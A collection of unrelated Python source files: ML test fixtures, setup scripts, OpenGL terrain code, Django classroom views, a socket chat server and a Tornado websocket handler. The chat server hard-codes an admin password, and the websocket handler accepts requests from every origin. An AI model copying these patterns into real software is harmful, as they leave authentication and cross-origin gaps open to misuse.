} # type: dict
"""
Default IntegratedGradients data.
"""
DEFAULT_META_CFRL = {"name": None,
"type": ["blackbox"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default CounterfactualRL metadata.
"""
DEFAULT_DATA_CFRL = {"orig": None,
"cf": None,
"target": None,
"condition": None} # type: dict
"""
Default CounterfactualRL data.
"""
|
import random
from abc import ABC
from typing import Optional
import gym
from rld.rollout import Trajectory, Timestep, Rollout
from rld.tests.resources.spaces import (
BOX_OBS_SPACE,
IMAGE_OBS_SPACE,
DICT_OBS_SPACE,
DISCRETE_ACTION_SPACE,
MULTI_DISCRETE_ACTION_SPACE,
TUPLE_ACTION_SPACE,
)
class BaseEnv(gym.Env, ABC):
    """Minimal random-walk environment used as a test fixture.

    Subclasses supply ``observation_space`` and ``action_space`` as class
    attributes; observations are random samples and episodes end with
    probability ~0.5 per step.
    """

    def __init__(self, env_config: Optional[dict] = None):
        super().__init__()
        self.env_config = env_config

    def reset(self):
        # Any random observation works as an initial state here.
        return self.observation_space.sample()

    def step(self, action):
        step_reward = random.random()
        episode_done = step_reward > 0.5
        return self.observation_space.sample(), step_reward, episode_done, {}

    def render(self, mode="human"):
        # Nothing to draw for a synthetic test env.
        pass
# One concrete env per (observation space x action space) combination,
# so tests can iterate the full support matrix via ALL_ENVS below.
class BoxObsDiscreteActionEnv(BaseEnv):
    observation_space = BOX_OBS_SPACE
    action_space = DISCRETE_ACTION_SPACE
class BoxObsMultiDiscreteActionEnv(BaseEnv):
    observation_space = BOX_OBS_SPACE
    action_space = MULTI_DISCRETE_ACTION_SPACE
class BoxObsTupleActionEnv(BaseEnv):
    observation_space = BOX_OBS_SPACE
    action_space = TUPLE_ACTION_SPACE
class ImageObsDiscreteActionEnv(BaseEnv):
    observation_space = IMAGE_OBS_SPACE
    action_space = DISCRETE_ACTION_SPACE
class ImageObsMultiDiscreteActionEnv(BaseEnv):
    observation_space = IMAGE_OBS_SPACE
    action_space = MULTI_DISCRETE_ACTION_SPACE
class ImageObsTupleActionEnv(BaseEnv):
    observation_space = IMAGE_OBS_SPACE
    action_space = TUPLE_ACTION_SPACE
class DictObsDiscreteActionEnv(BaseEnv):
    observation_space = DICT_OBS_SPACE
    action_space = DISCRETE_ACTION_SPACE
class DictObsMultiDiscreteActionEnv(BaseEnv):
    observation_space = DICT_OBS_SPACE
    action_space = MULTI_DISCRETE_ACTION_SPACE
class DictObsTupleActionEnv(BaseEnv):
    observation_space = DICT_OBS_SPACE
    action_space = TUPLE_ACTION_SPACE
# Registry used by parametrized tests. Tuple-action variants are
# deliberately excluded (presumably unsupported — see commented entries).
ALL_ENVS = [
    BoxObsDiscreteActionEnv,
    BoxObsMultiDiscreteActionEnv,
    # BoxObsTupleActionEnv,
    ImageObsDiscreteActionEnv,
    ImageObsMultiDiscreteActionEnv,
    # ImageObsTupleActionEnv,
    DictObsDiscreteActionEnv,
    DictObsMultiDiscreteActionEnv,
    # DictObsTupleActionEnv,
]
def collect_trajectory(env: gym.Env, max_steps: int = 100) -> Trajectory:
    """Roll out a single episode of `env`, up to `max_steps` steps.

    Samples random actions until the episode terminates or the step budget
    is exhausted, and returns the recorded Trajectory.
    """
    obs = env.reset()
    timesteps = []
    # BUG FIX: the original used `while i < max_steps` but never
    # incremented i, so max_steps was ignored and the loop could spin
    # forever if `done` never became True.
    for _ in range(max_steps):
        action = env.action_space.sample()
        new_obs, reward, done, info = env.step(action)
        timesteps.append(Timestep(obs, action, reward, done, info))
        obs = new_obs
        if done:
            break
    return Trajectory(timesteps)
def collect_rollout(
    env: gym.Env, episodes: int = 10, max_steps_per_episode: int = 100
) -> Rollout:
    """Collect `episodes` trajectories from `env` into a single Rollout."""
    return Rollout([
        collect_trajectory(env, max_steps_per_episode)
        for _ in range(episodes)
    ])
|
import numpy as np
import matplotlib.pyplot as plt
def mystep(x, y, ax=None, where='post', **kwargs):
    """Step plot drawing only the horizontal segments (no verticals).

    Each step becomes its own horizontal segment; a NaN after every
    segment breaks the line so no vertical connectors are drawn.
    https://stackoverflow.com/questions/44961184/matplotlib-plot-only-horizontal-lines-in-step-plot
    """
    assert where in ['post', 'pre']
    x = np.array(x)
    y = np.array(y)
    # 'post' holds y[i] until x[i+1]; 'pre' holds y[i+1] from x[i].
    y_slice = y[:-1] if where == 'post' else y[1:]
    # Rows of (x_start, x_end, x_end) paired with (y, y, NaN).
    X = np.c_[x[:-1], x[1:], x[1:]]
    Y = np.c_[y_slice, y_slice, np.zeros_like(x[:-1]) * np.nan]
    if not ax:
        ax = plt.gca()
    return ax.plot(X.flatten(), Y.flatten(), **kwargs)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Packaging metadata for the "google-common" namespace package, which
# only reserves the `google` package namespace (sources live under src/).
config = {
    'name': 'google-common',
    'version': '0.0.1',
    'description': 'Google namespace package',
    'author': 'haosdent',
    'author_email': 'haosdent@gmail.com',
    'url': 'http://pypi.python.org/pypi/google-common',
    'packages': [ 'google' ],
    'package_dir': { '': 'src' },
    'license': 'Apache 2.0',
    'keywords': ['google', 'namespace'],
    'classifiers': [ ]
}
from setuptools import setup
setup(**config)
|
from golem import actions
from golem.core.exceptions import ElementNotFound
description = 'Verify the webdriver.find method throws error when element is not found'
def test(data):
    """Verify that browser.find raises ElementNotFound for a bad selector."""
    actions.navigate(data.env.url+'elements/')
    browser = actions.get_browser()
    selector = '.invalid-selector-value'
    actions.step('Find element by css')
    try:
        browser.find(css=selector)
    except ElementNotFound:
        # Expected: the selector matches nothing.
        pass
    else:
        # BUG FIX: previously the test silently passed when no exception
        # was raised, i.e. when the behavior under test was broken.
        raise AssertionError(
            'ElementNotFound was not raised for selector {}'.format(selector))
|
from itertools import cycle
import glfw
import numpy as np
import OpenGL.GL as GL
from PIL import Image
from mesh import Mesh
from texture import Texture
from transform import normalized
from node import Node
import config
# -------------- Example texture plane class ----------------------------------
class TexturedPlane(Mesh, Node):
""" Simple first textured object """
def __init__(self, background_texture_file, road_texture_file, road2_texture_file, blendmap_file, shader, size, hmap_file):
# Load heightmap file
hmap_tex = np.asarray(Image.open(hmap_file).convert('RGB'))
self.MAX_HEIGHT = 30
self.MIN_HEIGHT = 0
self.MAX_PIXEL_COLOR = 256
self.HMAP_SIZE = hmap_tex.shape[0] # 256
self.background_texture_file = background_texture_file
self.road_texture_file = road_texture_file
self.road2_texture_file = road2_texture_file
self.blendmap_file = blendmap_file
# self.fog_colour = FogColour()
vertices, texture_coords, normals, indices = self.create_attributes(self.HMAP_SIZE, hmap_tex=hmap_tex)
super().__init__(shader, [vertices, texture_coords, normals], indices)
self.names = ['diffuse_map', 'blue_texture', 'red_texture', 'blendmap', 'fog_colour']
self.loc1 = {n: GL.glGetUniformLocation(shader.glid, n) for n in self.names}
# interactive toggles
self.wrap = cycle([GL.GL_REPEAT, GL.GL_MIRRORED_REPEAT,
GL.GL_CLAMP_TO_BORDER, GL.GL_CLAMP_TO_EDGE])
self.filter = cycle([(GL.GL_NEAREST, GL.GL_NEAREST),
(GL.GL_LINEAR, GL.GL_LINEAR),
(GL.GL_LINEAR, GL.GL_LINEAR_MIPMAP_LINEAR)])
self.wrap_mode, self.filter_mode = next(self.wrap), next(self.filter)
# setup texture and upload it to GPU
self.background_texture = Texture(self.background_texture_file, self.wrap_mode, *self.filter_mode)
self.road_texture = Texture(self.road_texture_file, self.wrap_mode, *self.filter_mode)
self.road2_texture = Texture(self.road2_texture_file, self.wrap_mode, *self.filter_mode)
self.blendmap_texture = Texture(self.blendmap_file, self.wrap_mode, *self.filter_mode)
def create_attributes(self, size, hmap_tex):
vertices = []
normals = []
texture_coords = []
# Create vertices, normals, and texture coordinates
for i in range(0, size):
for j in range(0, size):
# Vertices - (x, y, z)
vertices.append([(j / (size - 1)) * 1000,
self.get_height(i, j, image=hmap_tex),
(i / (size - 1)) * 1000])
normals.append(self.calculate_normal(x=j, z=i, hmap_image=hmap_tex))
# normals.append([0, 1, 0])
texture_coords.append([j / (size - 1), i / (size - 1)])
# Convert to numpy array list
vertices = np.array(vertices)
normals = np.array(normals)
texture_coords = np.array(texture_coords)
indices = []
for gz in range(0, size - 1):
for gx in range(0, size - 1):
top_left = (gz * size) + gx
top_right = top_left + 1
bottom_left = ((gz + 1) * size) + gx
bottom_right = bottom_left + 1
indices.append([top_left, bottom_left, top_right, top_right, bottom_left, bottom_right])
indices = np.array(indices)
return vertices, texture_coords, normals, indices
def calculate_normal(self, x, z, hmap_image):
"""
Calculate normals based on current point's neightbours.
:param x: x coordinate
:param z: z coordinate
:param hmap_image: the heightmap image
:return: normalized calculated normals
"""
height_l = self.get_height(x-1, z, image=hmap_image)
height_r = self.get_height(x+1, z, hmap_image)
height_d = self.get_height(x, z-1, hmap_image)
height_u = self.get_height(x, z+1, hmap_image)
return normalized(np.array([height_l-height_r, 2.0, height_d-height_u]))
def get_height(self, x, z, image):
if x < 0 or x >= image.shape[0] or z < 0 or z >= image.shape[0]:
return 0
height = image[x, z, 0]
# [0 to 1] range
height /= self.MAX_PIXEL_COLOR
# [0 to MAX_HEIGHT] range
height *= self.MAX_HEIGHT
return height
def key_handler(self, key):
# some day-night interactive elements
if key == glfw.KEY_F6:
config.fog_colour.toggle_value = 6
if key == glfw.KEY_F7:
config.fog_colour.toggle_value = 7
if key == glfw.KEY_F8:
config.fog_colour.toggle_value = 8
def draw(self, projection, view, model, primitives=GL.GL_TRIANGLES):
GL.glUseProgram(self.shader.glid)
# texture access setups
self.bind_textures()
self.connect_texture_units()
super().draw(projection, view, model, primitives)
def connect_texture_units(self):
    """Point the shader's sampler uniforms at texture units 0-3 (which
    bind_textures() fills) and upload fog/lighting uniforms."""
    GL.glUniform1i(self.loc1['diffuse_map'], 0)
    GL.glUniform1i(self.loc1['blue_texture'], 1)
    GL.glUniform1i(self.loc1['red_texture'], 2)
    GL.glUniform1i(self.loc1['blendmap'], 3)
    GL.glUniform3fv(self.loc1['fog_colour'], 1, config.fog_colour.get_colour())
    # Per-light uniforms: position and attenuation factors, one array slot
    # per light source managed by the global config.
    for i in range(0, config.fog_colour.num_light_src):
        light_pos_loc = GL.glGetUniformLocation(self.shader.glid, 'light_position[%d]' % i)
        GL.glUniform3fv(light_pos_loc, 1, config.fog_colour.light_pos[i])
        atten_loc = GL.glGetUniformLocation(self.shader.glid, 'atten_factor[%d]' % i)
        GL.glUniform3fv(atten_loc, 1, config.fog_colour.get_atten()[i])
def bind_textures(self):
    """Bind the four terrain textures to texture units 0-3, in the order
    expected by connect_texture_units()."""
    textures = (self.background_texture, self.road_texture,
                self.road2_texture, self.blendmap_texture)
    for unit, texture in enumerate(textures):
        # GL_TEXTUREi constants are guaranteed contiguous by the GL spec.
        GL.glActiveTexture(GL.GL_TEXTURE0 + unit)
        GL.glBindTexture(GL.GL_TEXTURE_2D, texture.glid)
|
from pathlib import Path
from fastapi import FastAPI
from fastapi import staticfiles
from fastapi.staticfiles import StaticFiles
from fastapi_static_digest import StaticDigest, StaticDigestCompiler
app_root = Path(__file__).parent
static_input_dir = app_root / "static"
def create_app(output_dir=None):
    """Create the FastAPI app with digested static files mounted at /static.

    :param output_dir: pre-built digest directory; when None, the package's
        own ``static`` directory is digested at startup.
    :return: the configured FastAPI application
    """
    app = FastAPI()
    # Both branches previously duplicated the StaticFiles construction;
    # only the StaticDigest source differs.
    if output_dir is not None:
        static_digest = StaticDigest(static_dir=output_dir)
    else:
        static_digest = StaticDigest(source_dir=static_input_dir)
    static = StaticFiles(directory=static_digest.directory)
    app.mount("/static", static, name="static")
    return app
import threading
import socket

# Host is the IP address the server binds to; 127.0.0.1 restricts it to
# the local machine.
host = "127.0.0.1"
port = 5555  # Any uncommon port (avoid well-known ones such as 80)

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the server to the IP address and start listening for connections.
server.bind((host, port))
server.listen()

# Parallel lists of connected client sockets and their nicknames; index i
# in one corresponds to index i in the other.
clients = []
nicknames = []
# 1.Broadcasting Method
def broadcast(message):
    """Send *message* (bytes) to every currently connected client."""
    for connection in clients:
        connection.send(message)
# 2.Recieving Messages from client then broadcasting
def handle(client):
    """Per-client loop: relay chat messages and process admin commands.

    Runs in its own thread.  On any receive/decode failure the client is
    removed from the shared lists, closed, and its departure broadcast.

    Fixes: disconnect path used ``client.remove(client)`` instead of
    ``clients.remove(client)`` and never actually called ``close()``
    (bare ``client.close`` attribute access).
    """
    while True:
        try:
            message = client.recv(1024)
            text = message.decode('ascii')
            if text.startswith('KICK'):
                # Only the 'admin' nickname may kick.
                if nicknames[clients.index(client)] == 'admin':
                    kick_user(text[5:])
                else:
                    client.send('Command Refused!'.encode('ascii'))
            elif text.startswith('BAN'):
                if nicknames[clients.index(client)] == 'admin':
                    name_to_ban = text[4:]
                    kick_user(name_to_ban)
                    # Persist the ban; recieve() checks bans.txt on connect.
                    with open('bans.txt', 'a') as f:
                        f.write(f'{name_to_ban}\n')
                    print(f'{name_to_ban} was banned by the Admin!')
                else:
                    client.send('Command Refused!'.encode('ascii'))
            else:
                broadcast(message)  # As soon as a message is received, broadcast it.
        except Exception:
            if client in clients:
                index = clients.index(client)
                nickname = nicknames[index]
                clients.remove(client)
                client.close()
                broadcast(f'{nickname} left the Chat!'.encode('ascii'))
                nicknames.remove(nickname)
            break
# Main Recieve method
def recieve():
    """Accept clients forever; enforce bans, gate the admin nickname behind
    a password, then spawn one handle() thread per client.

    (Name kept as 'recieve' since it is called at module level.)
    """
    while True:
        client, address = server.accept()
        print(f"Connected with {str(address)}")
        # Ask the client for a nickname (client protocol: reply to 'NICK').
        client.send('NICK'.encode('ascii'))
        nickname = client.recv(1024).decode('ascii')
        # Refuse banned nicknames; bans.txt holds one name per line.
        with open('bans.txt', 'r') as f:
            bans = f.readlines()
        if nickname+'\n' in bans:
            client.send('BAN'.encode('ascii'))
            client.close()
            continue
        # The admin nickname is password protected.
        if nickname == 'admin':
            client.send('PASS'.encode('ascii'))
            password = client.recv(1024).decode('ascii')
            # NOTE(review): hard-coded password — acceptable for this demo
            # chat only, not a real login system.
            if password != 'adminpass':
                client.send('REFUSE'.encode('ascii'))
                client.close()
                continue
        nicknames.append(nickname)
        clients.append(client)
        print(f'Nickname of the client is {nickname}')
        broadcast(f'{nickname} joined the Chat'.encode('ascii'))
        client.send('Connected to the Server!'.encode('ascii'))
        # Handle multiple clients simultaneously: one thread per client.
        thread = threading.Thread(target=handle, args=(client,))
        thread.start()
def kick_user(name):
    """Disconnect the user called *name* (if connected) and announce it."""
    if name not in nicknames:
        return
    index = nicknames.index(name)
    target = clients[index]
    clients.remove(target)
    target.send('You Were Kicked from Chat !'.encode('ascii'))
    target.close()
    nicknames.remove(name)
    broadcast(f'{name} was kicked from the server!'.encode('ascii'))
# Entry point: announce readiness and run the accept loop forever.
print('Server is Listening ...')
recieve()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Setuptools build system configuration file
for Faker Wi-Fi ESSID.
See https://setuptools.readthedocs.io.
"""
# Fail with a clear message when setuptools is missing.  Fix: catch only
# ImportError — the previous broad `except Exception` re-labelled any
# unrelated failure as a missing-setuptools error.
try:
    from setuptools import setup, find_packages
except ImportError as setuptools_not_present:
    raise ImportError(
        "Setuptools is required to install Faker Wi-Fi ESSID!"
    ) from setuptools_not_present

from codecs import open as fopen
from os.path import dirname, abspath, join

DIR = dirname(abspath(__file__))
VERSION = "0.3.1"
URL = "https://github.com/SkypLabs/faker-wifi-essid"
DL_URL = URL + "/archive/v{0}.zip"

# The long description shown on PyPI comes straight from the README.
with fopen(join(DIR, "README.rst"), encoding="utf-8") as f:
    LONG_DESCRIPTION = f.read()

setup(
    name="faker_wifi_essid",
    version=VERSION,
    description="Faker provider for Wi-Fi ESSIDs.",
    long_description=LONG_DESCRIPTION,
    license="MIT",
    keywords="faker faker-library faker-provider faker-generator wifi essid",
    author="Paul-Emmanuel Raoul",
    author_email="skyper@skyplabs.net",
    url=URL,
    download_url=DL_URL.format(VERSION),
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "License :: OSI Approved :: MIT License",
    ],
    packages=find_packages(
        exclude=[
            "doc*",
            "test*",
        ],
    ),
    python_requires=">=3.5, <4",
    install_requires=[
        "Faker >= 4.1,< 10.0",
    ],
    extras_require={
        "tests": [
            "flake8",
            "pylint",
            "tox"
        ],
        "docs": [
            "Sphinx >= 3.2",
            "sphinx_rtd_theme >= 0.5.0",
        ],
    },
)
|
from pylinlin.matrix import Matrix
from pylinlin.matrix_view import MatrixView
from pylinlin.householder import Householder
def compute_qr_factorization(mat: Matrix) -> (Matrix, Matrix):
    """Compute A = QR via successive Householder reflections.

    Returns (Q, R) where Q is orthogonal and R is upper triangular.
    The input matrix is never mutated.
    """
    work = mat.copy()  # do not overwrite the caller's matrix
    reflectors = []    # (column index, Householder) pairs, in application order
    for k in range(min(work.num_rows(), work.num_cols())):
        column = work.get_col(k)
        # Reflector that zeroes the entries below the diagonal of column k.
        reflector = Householder(column[k:])
        reflectors.append((k, reflector))
        work = reflector.multiply_left(work, pad_top=k)
    # Accumulate Q by applying the reflectors to the identity in reverse.
    q_mat = Matrix.identity(work.num_rows())
    for k, reflector in reversed(reflectors):
        q_mat = reflector.multiply_left(q_mat, pad_top=k)
    return (q_mat, work)
|
"""Exceptions for artifact I/O"""
from altimeter.core.exceptions import AltimeterException
class InvalidS3URIException(AltimeterException):
    """Raised when an S3 uri could not be parsed."""
|
from torch.utils.data import Sampler
class GroupLengthBatchSampler(Sampler):
    """Skeleton batch sampler — presumably meant to group samples of similar
    length into batches (TODO: implement).  All methods are stubs."""

    def __init__(self, data_source, batch_size, batches_per_group=20):
        super().__init__(data_source)
        # TODO: your code here (optional)
        raise NotImplementedError

    def __iter__(self):
        # Should yield lists of dataset indices forming one batch each.
        raise NotImplementedError

    def __len__(self):
        # Should return the number of batches per epoch.
        raise NotImplementedError
|
from tornado.websocket import WebSocketHandler
class SocketHandler(WebSocketHandler):
    """Minimal WebSocket handler that tracks online users and broadcasts.

    Fix: removed the zero-argument ``__init__`` override — Tornado
    instantiates handlers as ``Handler(application, request, **kwargs)``,
    so the previous ``def __init__(self)`` raised a TypeError on every
    connection.  The base-class constructor is used instead.
    """

    # Class-level container holding all currently connected handlers.
    users = set()

    def open(self):
        # Add the user to the container once the connection is established,
        # then send a message to every online user.
        self.users.add(self)
        for u in self.users:
            u.write_message("hello")

    def on_message(self, message):
        # Broadcast to all online users.
        for u in self.users:
            u.write_message(u"hello2")

    def on_close(self):
        # Remove the user from the container after the connection closes,
        # then notify the remaining users.
        self.users.remove(self)
        for u in self.users:
            u.write_message("ffffff")

    def check_origin(self, origin):
        # Allow cross-origin WebSocket requests.
        return True
|
from sqlalchemy import create_engine, MetaData, Table
from tabref.searcher import TableSearcher
def connect_db(uri):
    """Connect to *uri*, reflect the existing schema, and return the
    bound MetaData object."""
    engine = create_engine(uri)
    metadata = MetaData(bind=engine)
    metadata.reflect(bind=engine)
    return metadata
class SqlTableSearcher(TableSearcher):
    """TableSearcher backed by a SQL table reflected through SQLAlchemy."""

    def __init__(self, matcher, out_dir, db, table):
        # *db* is a bound MetaData (see connect_db); autoload reflects the
        # table's columns from the live database.
        self.meta = db
        self.table = Table(table, self.meta, autoload=True)
        super(SqlTableSearcher, self).__init__(matcher, out_dir, table)

    def rows(self):
        """Yield every row of the table, fetching in chunks of 10000 to
        bound memory use."""
        rp = self.meta.bind.execute(self.table.select())
        while True:
            rows = rp.fetchmany(10000)
            # fetchmany returns an empty list when exhausted; None is
            # guarded for defensively.
            if rows is None or not len(rows):
                break
            for row in rows:
                yield row
|
import uuid
from datetime import datetime
from django.shortcuts import render, redirect
from .models import Classroom, ClassroomStudents, ClassComments
from users.decorators import faculty_required, student_required
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from django.utils.datastructures import MultiValueDictKeyError
'''
Function to get all Classroom list details
'''
@login_required(login_url='/users/login')
def list(request):
    """List classrooms: ones joined for students, ones owned for faculty.

    NOTE(review): the view name shadows the builtin ``list``; kept as-is
    because URLconfs reference it by name.
    """
    user = request.user
    # The classroom list shown depends on the user type.
    if user.isStudent:
        classroomStudents = ClassroomStudents.objects.filter(student=user)
        return render(request, './classroom/list.html', {'classroomStudents': classroomStudents})
    else:
        classrooms = Classroom.objects.filter(user=user)
        return render(request, './classroom/list.html', {'classrooms': classrooms})
'''
Function to create Classroom
'''
@faculty_required()
def create(request):
    """Render the creation form (GET) or create a new Classroom (POST)."""
    if request.method == "GET":
        return render(request, "classroom/create.html")
    classroom = Classroom(
        user=request.user,
        name=request.POST['name'],
        description=request.POST['description'],
        semester=request.POST['semester'],
        year=int(datetime.now().strftime('%Y')),
        classroomCode=uuid.uuid4(),  # random, unguessable join code
        branch=request.POST['branch'],
    )
    classroom.save()
    return redirect('/classroom/')
'''
Function to get Classroom details
'''
@login_required(login_url='/users/login')
def view(request):
    """Show a classroom and its comments to an authorised student or owner."""
    user = request.user
    # 404 when the classroom does not exist or the id is missing/invalid.
    try:
        classId = request.GET['id']
        classroom = Classroom.objects.get(classId=classId)
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    # Fetch all the class comments belonging to this particular classroom.
    comments = ClassComments.objects.filter(classroom=classroom)
    if user.isStudent:
        # A student may view the classroom only if they have joined it.
        try:
            classroomStudent = ClassroomStudents.objects.get(student=user, classroom=classroom)
            return render(request, './classroom/view.html', {'classroom': classroom, 'comments': comments})
        except ObjectDoesNotExist:
            return render(request, "accessDenied.html", {})
    else:
        # A faculty member may view the classroom only if they created it.
        if classroom.user == user:
            return render(request, './classroom/view.html', {'classroom': classroom, 'comments': comments})
        else:
            return render(request, "accessDenied.html", {})
'''
Function to edit the Classroom details
'''
@faculty_required()
def edit(request):
    """Render the edit form (GET) or apply edits to a Classroom (POST).

    Both phases re-check that the classroom exists and belongs to the
    logged-in faculty user.
    """
    if request.method == "GET":
        # 404 when the classroom does not exist / id is invalid.
        try:
            classId = request.GET['id']
            classroom = Classroom.objects.get(classId=classId)
            # Only the owning faculty user may edit.
            if classroom.user != request.user:
                return render(request, 'accessDenied.html', {})
        except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
            return render(request, '404.html', {})
        return render(request, "classroom/edit.html", {'classroom': classroom})
    # POST: same existence/ownership checks against the posted id.
    try:
        classId = request.POST['classId']
        classroom = Classroom.objects.get(classId=classId)
        if classroom.user != request.user:
            return render(request, 'accessDenied.html', {})
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    classroom.name = request.POST['name']
    classroom.description = request.POST['description']
    classroom.semester = request.POST['semester']
    classroom.branch = request.POST['branch']
    classroom.save()
    return redirect('/classroom/')
'''
Function to delete particular Classroom
'''
@faculty_required()
def delete(request):
    """Render the confirmation page (GET) or delete a Classroom (POST).

    Mirrors edit(): both phases verify existence and ownership.
    """
    if request.method == "GET":
        # 404 when the classroom does not exist / id is invalid.
        try:
            classId = request.GET['id']
            classroom = Classroom.objects.get(classId=classId)
            # Only the owning faculty user may delete.
            if classroom.user != request.user:
                return render(request, 'accessDenied.html', {})
        except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
            return render(request, '404.html', {})
        return render(request, "classroom/delete.html", {'classroom': classroom})
    # POST: re-check against the posted id, then delete.
    try:
        classId = request.POST['classId']
        classroom = Classroom.objects.get(classId=classId)
        if classroom.user != request.user:
            return render(request, 'accessDenied.html', {})
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    classroom.delete()
    return redirect('/classroom/')
'''
Function to join classroom by Student
'''
@student_required()
def joinClassroom(request):
    """Render the join form (GET) or join a classroom by its code (POST)."""
    if request.method == "GET":
        return render(request, "classroom/joinClassroom.html", {})
    student = request.user
    # 404 when the classroom code is invalid or no classroom matches it.
    try:
        code = request.POST["classroomCode"]
        classroom = Classroom.objects.get(classroomCode=code)
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    # Create the membership only if the student is not already a member.
    try:
        ClassroomStudents.objects.get(classroom=classroom, student=student)
    except ObjectDoesNotExist:
        ClassroomStudents(classroom=classroom, student=student).save()
        return redirect('/classroom/')
    return render(request, "classroom/joinClassroom.html",
                  {"errorMessage": "You Have already Joined the Classroom"})
'''
Function to leave classroom by Student
'''
@student_required()
def leaveClassroom(request):
    """Render the confirmation page (GET) or remove the student's
    membership (POST).

    NOTE(review): the GET phase looks the classroom up by ``id`` while the
    POST phase uses ``classroomCode`` — confirm the template posts the code.
    """
    user = request.user
    if request.method == "GET":
        # 404 when the requested classroom does not exist.
        try:
            classId = request.GET['id']
            classroom = Classroom.objects.get(classId=classId)
        except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
            return render(request, '404.html', {})
        # Only a student who joined the classroom may see the page.
        try:
            classroomStudent = ClassroomStudents.objects.get(student=user, classroom=classroom)
            return render(request, './classroom/leaveClassroom.html', {'classroom': classroom})
        except ObjectDoesNotExist:
            return render(request, "accessDenied.html", {})
    # POST: 404 when the student never joined or the classroom is gone.
    try:
        user = request.user
        classroomCode = request.POST["classroomCode"]
        classroom = Classroom.objects.get(classroomCode=classroomCode)
        classroomStudent = ClassroomStudents.objects.get(classroom=classroom, student=user)
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    classroomStudent.delete()
    return redirect('/classroom/')
'''
function to create the problem comments
'''
@login_required(login_url='/users/login')
def commentCreate(request):
    """Attach a new comment (with optional file upload) to a classroom."""
    # 404 when the target classroom does not exist / id is invalid.
    try:
        classId = request.POST['classId']
        classroom = Classroom.objects.get(classId=classId)
    except (ObjectDoesNotExist, MultiValueDictKeyError, ValueError):
        return render(request, '404.html', {})
    ClassComments(
        comment=request.POST["comment"],
        user=request.user,
        classroom=classroom,
        attachmentPath=request.FILES.get('inputFile'),
    ).save()
    return redirect(f'/classroom/view/?id={classId}')
|
import matplotlib.pyplot as plt
from pytest import mark, raises
from orbital_diagrams.api import EnergyOrbital
from orbital_diagrams.orbitals._base_orbital import BaseOrbital
from orbital_diagrams.plot import cycle_values, plotter, setup_axis, subplots
def test_setup_axis():
    """setup_axis accepts every known style name (and kwargs) and raises
    NotImplementedError for an unknown one."""
    fig, ax = plt.subplots()
    setup_axis(ax, None, xticks=range(100), xlim=(0, 100))
    setup_axis(ax, "BaseOrbital")
    setup_axis(ax, "EnergyOrbital")
    setup_axis(ax, "ComboOrbital")
    setup_axis(ax, "ComboEnergyOrbital")
    setup_axis(ax, "ComboOrbitalGroup")
    setup_axis(ax, "ComboEnergyOrbitalGroup")
    # The string "None" (unlike the value None) is not a recognised style.
    with raises(NotImplementedError):
        setup_axis(ax, "None")
def test_subplots():
    """subplots returns a (figure, axes) pair whose axes grid matches the
    requested rows/cols."""
    assert len(subplots("BaseOrbital")) == 2
    assert len(subplots("EnergyOrbital")[1]) == 1
    assert subplots("ComboOrbital", 1, 4)[1].shape == (1, 4)
    assert subplots("ComboEnergyOrbital", 3, 5)[1].shape == (3, 5)
@mark.xfail
def test_plotter(tmp_path):
    """Smoke-test plotter() across style / keyword-argument combinations,
    writing figures into pytest's tmp_path.  Marked xfail — presumably the
    suite tolerates rendering failures here; confirm before relying on it."""
    # Explicit (fig, ax) target plus most keyword options.
    fig, ((ax,),) = subplots("BaseOrbital")
    plotter(
        [BaseOrbital(), BaseOrbital(), BaseOrbital()],
        title="Hello World",
        style="BaseOrbital",
        plot=(fig, ax),
        xlim=(0, 2),
        xticks_minor=True,
        yticks_minor=2,
        legend=True,
        colors=None,
        markers=None,
        linestyles=None,
        savefig=f"{tmp_path}/BaseOrbitals.png",
    )
    # EnergyOrbital style with per-series alphas/colors/linestyles.
    plotter(
        [EnergyOrbital(-1), EnergyOrbital(-2), EnergyOrbital(-3)],
        title="World",
        style="EnergyOrbital",
        plot=None,
        xlim=None,
        xticks=None,
        xticks_minor=1,
        yticks_minor=True,
        legend=False,
        alphas=[0.9, 0.1],
        colors=["b", "k"],
        markers="x",
        linestyles=["-", ":"],
        savefig=f"{tmp_path}/",
    )
    # Style derived from a type name; empty orbital list.
    plotter(
        [],
        title="Hello",
        style=type(BaseOrbital()).__name__,
        plot=None,
        xlim=None,
        xticks=None,
        legend=True,
        colors=None,
        markers=None,
        linestyles=None,
        savefig=f"{tmp_path}/",
    )
    # No style at all.
    plotter(
        [],
        title="Hello",
        style=None,
        plot=None,
        xlim=(0, 10),
        xticks=None,
        legend=False,
        colors=None,
        markers="+",
        linestyles="--",
        savefig=f"{tmp_path}/",
    )
    # y-axis options and a scalar alpha.
    plotter(
        [],
        title="Hello",
        style=None,
        plot=None,
        xlim=(0, 10),
        xticks=None,
        ylim=(0, 10),
        yticks=(0, 5, 10),
        yticks_minor=True,
        legend=False,
        colors=None,
        alphas=0.5,
        markers="+",
        linestyles="--",
        savefig=f"{tmp_path}/",
    )
    # Unknown styles must raise.
